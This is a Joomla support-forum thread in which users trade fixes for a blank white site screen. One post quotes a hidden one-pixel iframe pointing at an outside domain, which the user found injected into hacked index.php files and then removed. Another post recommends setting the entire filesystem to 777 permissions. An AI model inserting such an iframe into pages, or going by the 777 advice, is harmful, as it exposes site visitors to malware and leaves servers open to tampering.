The Joomla! Forum ™



Forum rules


Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.



Post new topic Reply to topic  [ 15 posts ] 
Author Message
PostPosted: Mon Apr 14, 2008 12:24 am 
Joomla! Fledgling
Joomla! Fledgling

Joined: Mon Sep 17, 2007 11:54 am
Posts: 1
Hi
When I go to my website all I see is a blank white screen. None of the pages on the front end work but I can login to the back end and make changes and navigate around. Some of the components are showing parse errors when I try to view them. I am using version 1.15 and I have not load any new mambots or modules in several weeks. I have also read through most of the forum topics with issues similar to mine and none of the fixes worked for me. Here is a link to the site http://www.discoverpoint.org. any help would be appreciated


Top
 Profile  
 
PostPosted: Mon May 12, 2008 6:16 pm 
Joomla! Fledgling
Joomla! Fledgling

Joined: Mon May 12, 2008 6:14 pm
Posts: 3
How did you fix it?


Top
 Profile  
 
PostPosted: Mon Jul 14, 2008 6:48 pm 
Joomla! Intern
Joomla! Intern

Joined: Wed Apr 26, 2006 10:48 pm
Posts: 50
I have had this problem appear as well.


Top
 Profile  
 
PostPosted: Mon Jul 14, 2008 9:26 pm 
Joomla! Fledgling
Joomla! Fledgling

Joined: Mon May 12, 2008 6:14 pm
Posts: 3
I fixed my issue by downloading a new copy of the distribution and deploying it. My guess is there were some corrupt file(s) because nothing else was done to get it to work.


Top
 Profile  
 
PostPosted: Sun Aug 03, 2008 6:41 am 
Joomla! Apprentice
Joomla! Apprentice

Joined: Sun Nov 18, 2007 4:54 am
Posts: 5
So you had to redo your entire site?


Top
 Profile  
 
PostPosted: Mon Aug 04, 2008 7:52 pm 
Joomla! Fledgling
Joomla! Fledgling

Joined: Mon May 12, 2008 6:14 pm
Posts: 3
I replaced the site with the entire distribution since I did not feel like looking for the corrupt file(s).

Since I did not modify any actual Joomla code, this did not interefere with any content I may of had. content is stored in the database; which was in good shape.


Top
 Profile  
 
PostPosted: Fri Mar 20, 2009 12:05 pm 
Joomla! Fledgling
Joomla! Fledgling

Joined: Fri Mar 20, 2009 11:58 am
Posts: 3
I recently ran into this problem of the Blank/White Screen for both my frontend and backend Joomla site and I viewed the index.php files in the Joomla root and Joomla administrator folder and the both had the line below at the bottom line:

<html><body><iframe src="http://homenameregistration.cn/in.cgi?income11" width=1 height=1 style="visibility: hidden"></iframe></body></html>>

I have no clue how that got there but after I removed it on both index.php files the site was back to normal.

I hope that helps,
TDigs


Top
 Profile  
 
PostPosted: Tue Apr 14, 2009 3:38 pm 
Joomla! Fledgling
Joomla! Fledgling

Joined: Fri Mar 20, 2009 11:58 am
Posts: 3
It turns out that my site was hacked and that code: <html><body><iframe src="http://homenameregistration.cn/in.cgi?income11" width=1 height=1 style="visibility: hidden"></iframe></body></html>> was used to spoof anyone who visited the site. It was hacked through a Joomla 1.5.9 exploit. See link below:

http://www.webmasterworld.com/webmaster/3441472.htm

- Tdigs


Top
 Profile  
 
PostPosted: Fri Sep 02, 2011 6:59 am 
Joomla! Fledgling
Joomla! Fledgling

Joined: Fri Aug 26, 2011 12:21 pm
Posts: 4
bwsworld wrote:
Hi
When I go to my website all I see is a blank white screen. None of the pages on the front end work but I can login to the back end and make changes and navigate around. Some of the components are showing parse errors when I try to view them. I am using version 1.15 and I have not load any new mambots or modules in several weeks. I have also read through most of the forum topics with issues similar to mine and none of the fixes worked for me. Here is a link to the site http://www.discoverpoint.org. any help would be appreciated

i had the similar issue. Additionally, i had a whitespace at the end of a PHP file. and i was surprised when found BOM option turned on (i remember that i turned it off).


Top
 Profile  
 
PostPosted: Sun Nov 20, 2011 12:11 pm 
Joomla! Fledgling
Joomla! Fledgling

Joined: Sun Nov 20, 2011 12:01 pm
Posts: 1
What I did was

Confirmed that I was running PHP 5.3.8 and 777d the entire filesystem. I also changed the group of the filesystem to psacln and the owner to the owner of the site or an FTP username. Then both the administrator and frontend came up.

I only knew this because I'm on a dedicated server and I had updated my OS and the OS didn't update the PHP. Thinking that it did, I was racking my brains to find the fault, so I went back to file permissions, 777d everything and it didn't come up. That global config wont work if you can't get into the administrator index.php. I could have gone into /etc/php.ini and turned on the error reporting there but chose not to. So I decided to create a file called phpinfo in the main folder and insert <?php phpinfo (); ?> . Bring up the http://mysite.blah/phpinfo.php and that gave me the version 5.1.6. So I went to upgrade it using a more detailed site because some will say go to a repository then type yum upgrade and job done. That was an err no because phpinfo still said version 5.1.6. So the more detailed site said, go to another repository, type yum upgrade, mv this file to that, move that file to something else and then it worked. As phpinfo then changed to 5.3.6. Rechecked the joomla site and it all came up.


Top
 Profile  
 
PostPosted: Sat Mar 03, 2012 11:45 pm 
Joomla! Enthusiast
Joomla! Enthusiast

Joined: Mon Sep 14, 2009 11:18 pm
Posts: 157
Hello There,
I have the same problem, white screen front end, but backend is okay. I found out now that the index.php is completely empty (It is a blank page.). How can I create a new index.php?
Regards,


Top
 Profile  
 
PostPosted: Sat Mar 03, 2012 11:50 pm 
Joomla! Enthusiast
Joomla! Enthusiast

Joined: Mon Sep 14, 2009 11:18 pm
Posts: 157
boizan wrote:
Hello There,
I have the same problem, white screen front end, but backend is okay. I found out now that the index.php is completely empty (It is a blank page.). How can I create a new index.php?
Regards,


I fixed the problem! I copied the index.php of another website.
It is working okay now!


Top
 Profile  
 
PostPosted: Tue Dec 18, 2012 11:18 am 
Joomla! Apprentice
Joomla! Apprentice

Joined: Thu Dec 13, 2012 9:57 am
Posts: 7
I transfer the existing website from server to localhost and i changed configuration.php with local database connection. Now the frontend works good, but the administrator screen appears blank.

Please advise me.

Thanks

_________________
http://mtniran.ir
http://mciiran.ir


Top
 Profile  
 
PostPosted: Sun Mar 10, 2013 4:27 pm 
User avatar
Joomla! Apprentice
Joomla! Apprentice

Joined: Sat Mar 25, 2006 2:43 am
Posts: 28
Location: Malaysia
This happen to me too. I realize it after upgrading my Joomla and Virtuemart. All of the sudden, my frontpage were giving me a white blank page.

I've look into the index.php and index.html. Everything is ok inside the source code. Can't figure out what exactly happen, I have deleted the 'index.html' and leave the 'index.php' on my server and everything back to normal.

_________________
~Engrave the Creativity~


Top
 Profile  
 
PostPosted: Tue May 07, 2013 5:35 pm 
Joomla! Fledgling
Joomla! Fledgling

Joined: Fri Aug 06, 2010 12:39 pm
Posts: 1
Overwriting the index.php with one from another Joomla 1.5 site, together with resetting permissions for everything, solved the problem for me, and I only thought it right to post accordingly. Thanks everyone. Note: I had the same problem on the backend, too.


Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 15 posts ] 



Who is online

Users browsing this forum: No registered users and 7 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  
Powered by phpBB® Forum Software © phpBB Group